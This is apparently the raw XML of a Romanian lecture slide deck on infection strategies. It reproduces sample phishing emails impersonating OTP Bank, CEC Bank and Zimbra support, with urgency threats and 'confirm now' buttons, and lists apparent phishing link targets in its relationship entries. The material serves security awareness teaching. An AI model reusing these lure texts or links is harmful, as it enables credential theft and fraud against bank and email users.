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0" r:id="rId4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId77"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="365" r:id="rId5"/>
    <p:sldId id="366" r:id="rId6"/>
    <p:sldId id="443" r:id="rId7"/>
    <p:sldId id="379" r:id="rId8"/>
    <p:sldId id="364" r:id="rId9"/>
    <p:sldId id="316" r:id="rId10"/>
    <p:sldId id="369" r:id="rId11"/>
    <p:sldId id="318" r:id="rId12"/>
    <p:sldId id="361" r:id="rId13"/>
    <p:sldId id="319" r:id="rId14"/>
    <p:sldId id="320" r:id="rId15"/>
    <p:sldId id="321" r:id="rId16"/>
    <p:sldId id="322" r:id="rId17"/>
    <p:sldId id="323" r:id="rId18"/>
    <p:sldId id="324" r:id="rId19"/>
    <p:sldId id="325" r:id="rId20"/>
    <p:sldId id="326" r:id="rId21"/>
    <p:sldId id="327" r:id="rId22"/>
    <p:sldId id="328" r:id="rId23"/>
    <p:sldId id="329" r:id="rId24"/>
    <p:sldId id="334" r:id="rId25"/>
    <p:sldId id="330" r:id="rId26"/>
    <p:sldId id="331" r:id="rId27"/>
    <p:sldId id="332" r:id="rId28"/>
    <p:sldId id="333" r:id="rId29"/>
    <p:sldId id="347" r:id="rId30"/>
    <p:sldId id="527" r:id="rId31"/>
    <p:sldId id="375" r:id="rId32"/>
    <p:sldId id="444" r:id="rId33"/>
    <p:sldId id="446" r:id="rId34"/>
    <p:sldId id="514" r:id="rId35"/>
    <p:sldId id="495" r:id="rId36"/>
    <p:sldId id="484" r:id="rId37"/>
    <p:sldId id="497" r:id="rId38"/>
    <p:sldId id="525" r:id="rId39"/>
    <p:sldId id="498" r:id="rId40"/>
    <p:sldId id="524" r:id="rId41"/>
    <p:sldId id="499" r:id="rId42"/>
    <p:sldId id="523" r:id="rId43"/>
    <p:sldId id="500" r:id="rId44"/>
    <p:sldId id="522" r:id="rId45"/>
    <p:sldId id="501" r:id="rId46"/>
    <p:sldId id="521" r:id="rId47"/>
    <p:sldId id="515" r:id="rId48"/>
    <p:sldId id="526" r:id="rId49"/>
    <p:sldId id="516" r:id="rId50"/>
    <p:sldId id="517" r:id="rId51"/>
    <p:sldId id="518" r:id="rId52"/>
    <p:sldId id="513" r:id="rId53"/>
    <p:sldId id="505" r:id="rId54"/>
    <p:sldId id="506" r:id="rId55"/>
    <p:sldId id="507" r:id="rId56"/>
    <p:sldId id="508" r:id="rId57"/>
    <p:sldId id="509" r:id="rId58"/>
    <p:sldId id="510" r:id="rId59"/>
    <p:sldId id="511" r:id="rId60"/>
    <p:sldId id="457" r:id="rId61"/>
    <p:sldId id="485" r:id="rId62"/>
    <p:sldId id="486" r:id="rId63"/>
    <p:sldId id="487" r:id="rId64"/>
    <p:sldId id="488" r:id="rId65"/>
    <p:sldId id="489" r:id="rId66"/>
    <p:sldId id="459" r:id="rId67"/>
    <p:sldId id="490" r:id="rId68"/>
    <p:sldId id="491" r:id="rId69"/>
    <p:sldId id="492" r:id="rId70"/>
    <p:sldId id="493" r:id="rId71"/>
    <p:sldId id="502" r:id="rId72"/>
    <p:sldId id="504" r:id="rId73"/>
    <p:sldId id="619" r:id="rId74"/>
    <p:sldId id="618" r:id="rId75"/>
    <p:sldId id="61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0236" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="144" d="100"/>
          <a:sy n="144" d="100"/>
        </p:scale>
        <p:origin x="91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6F407-2509-4896-B052-D1E133D2D6C1}"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AC7B3-F878-493F-9CCE-D2C2EBD91389}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="331537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1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="179401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AC7B3-F878-493F-9CCE-D2C2EBD91389}"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60520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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89861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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="353496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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3279495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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="185168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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12367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AC7B3-F878-493F-9CCE-D2C2EBD91389}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="394107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AC7B3-F878-493F-9CCE-D2C2EBD91389}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146705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AC7B3-F878-493F-9CCE-D2C2EBD91389}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="290377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49AC7B3-F878-493F-9CCE-D2C2EBD91389}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1572464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9AC7B3-F878-493F-9CCE-D2C2EBD91389}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197013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216773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395455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08576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282038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881072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950905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7001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42985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732269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66580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38766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496557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139339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71793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709459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1203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1663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87294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323807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408918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0386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5955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915885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35260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67509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116411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1636445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3057462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26748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487238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235621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173894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13916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8586447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221264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071903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504122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7107406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215879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55835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77507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4094629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651580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70506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4AC5B1-2738-48D4-A0C6-3A310133A60C}"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2083732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2967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4AC5B1-2738-48D4-A0C6-3A310133A60C}"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1253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4AC5B1-2738-48D4-A0C6-3A310133A60C}"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80018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335580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40285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jp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AC5B1-2738-48D4-A0C6-3A310133A60C}"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A3F78-FC3A-4AB5-AD97-234B982F5D45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45864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9210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96660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0954894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hyperlink" Target="https://mail.acad.ro/rc/?_task=mail&amp;_caps=pdf=1,flash=0,tif=0&amp;_uid=43710&amp;_mbox=INBOX&amp;_framed=1&amp;_search=add9f603c67fd337c24ab877ff6fa974&amp;_action=preview#NOP" TargetMode="Externa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hyperlink" Target="https://mail.acad.ro/rc/?_task=mail&amp;_caps=pdf=1,flash=0,tif=0&amp;_uid=37363&amp;_mbox=INBOX&amp;_framed=1&amp;_search=add9f603c67fd337c24ab877ff6fa974&amp;_action=preview#NOP" TargetMode="External"/><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hyperlink" Target="http://khylinmica.atwebpages.com/?url=https://mail.acad.ro/v2/index.php" TargetMode="Externa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hyperlink" Target="https://mail1.sci-researchoarestext.info/mautic/r/3ea070d050e059ea1886d9da3" TargetMode="Externa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hyperlink" Target="http://dawlia2030.com/Webmail/75/Webmail/webmail.php?email=paul_gagniuc@acad.ro" TargetMode="Externa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login.azurewebsites.net/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout41.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:support@github.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3.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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hyperlink" Target="http://www.nexxon-utilajeagricole.ro/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nexxon.ro/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout41.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/nexxonutilajeagricole/?ref=bookmar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462210" y="875627"/>
            <a:ext cx="10218364" cy="2766528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng"/>
              <a:t>C.12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Strategii de infectie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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1018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(3) – Explicație - Acțiune urgentă - Amenințare</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="743712" y="2172224"/>
            <a:ext cx="10619232" cy="4124206"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Draga Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Am fost nevoiți să limităm temporar anumite funcționalități ale contului până când îți actualizezi informațiile.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Datele pe care ni le-ați furnizat anterior nu mai sunt valabile. Deoarece nu v-ați actualizat la timp documentul de identitate, nu mai puteți adăuga sau primi bani în contul dumneavoastră. Puteți utiliza în continuare fondurile pe care le aveți deja în cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cum îmi pot actualiza datele ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Faceți clic pe butonul direct de mai jos pentru a deschide o fereastră de browser securizată.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Asigurați-vă că verificarea necesară este introdusă în întregime.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Acum puteți începe! De acum încolo, serviciile bancare online vor fi mai convenabile ca niciodată.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Verificați identitatea dumneavoastră aici:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Confirmați acum</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dacă nu ați făcut acest lucru înainte de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>08.10.2023</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, unele dintre funcțiile contului dumneavoastră vor fi restricționate pe viață.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Toate cele bune,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OTP Bank Romania</a:t>
            </a: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06218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(4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="2115181"/>
            <a:ext cx="10976824" cy="4339650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dragă Client,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Am observat o utilizare neobișnuită a cardului dvs. de credit de la adresa IP 213.162.80.119  Ca urmare, am descoperit că altcineva a folosit cardul dumneavoastră fără permisiunea dumneavoastră.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ce ar trebui să faceți?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Faceți clic pe linkul direct de mai jos pentru a deschide o fereastră de browser securizată și urmați instrucțiunile pentru a efectua imediat o verificare a identității și pentru a vă revizui activitatea recentă.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Confirmați acum</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Notă : Vă rugăm să faceți acest lucru în termen de 24 de ore, în caz contrar vom fi nevoiți să vă blocăm accesul pe termen nelimitat, deoarece ar putea fi folosit în scopuri frauduloase.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cu prietenie,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Echipa CEC Bank</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Perioada promotiei: aprilie - septembrie 2023. Regulamentul promotiei este disponibil pe www.cec.ro, in agentiile CEC Bank si in reteaua de agenti proprii. Comision administrare anual 36 Lei, comision deschidere contract economisire-creditare 1%. *Comision ZERO de analiza dosar pentru creditul intermediar si anticipat. Exemplu de calcul: pentru un credit de 70.000 Lei, perioada de rambursare este de aproximativ 11 ani si 9 luni, cu avans de 20%, dobanda este de 4,99% in primele 50 de luni, cu o rata lunara de 572 Lei, si 4,5% in urmatoarele 91 de luni, cu o rata lunara de 490 Lei, DAE 5,2%, suma totala de rambursat este de aproximativ 72.851 Lei (nu include avansul). In calcule sunt incluse si primele din partea statului aferente contractelor de economisire-creditare atasate la contractele de credit, conform legislatiei in vigoare.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9416" y="4660392"/>
            <a:ext cx="3608614" cy="673608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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05327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028944" y="1943099"/>
            <a:ext cx="568756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(5)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6825448" y="3070512"/>
            <a:ext cx="4669536" cy="2215991"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attention   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>We are deactivating all inactive account pls confirm if your email  ,is still active by verifying your account now</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CLICK HERE TO VERIFY </a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" b="1" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NOTE: in 48 hours all inactive account will be deactivated</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Regards,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Zimbra Support Team</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="770168" y="3020552"/>
            <a:ext cx="5023104" cy="2462213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Buna dimineata,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
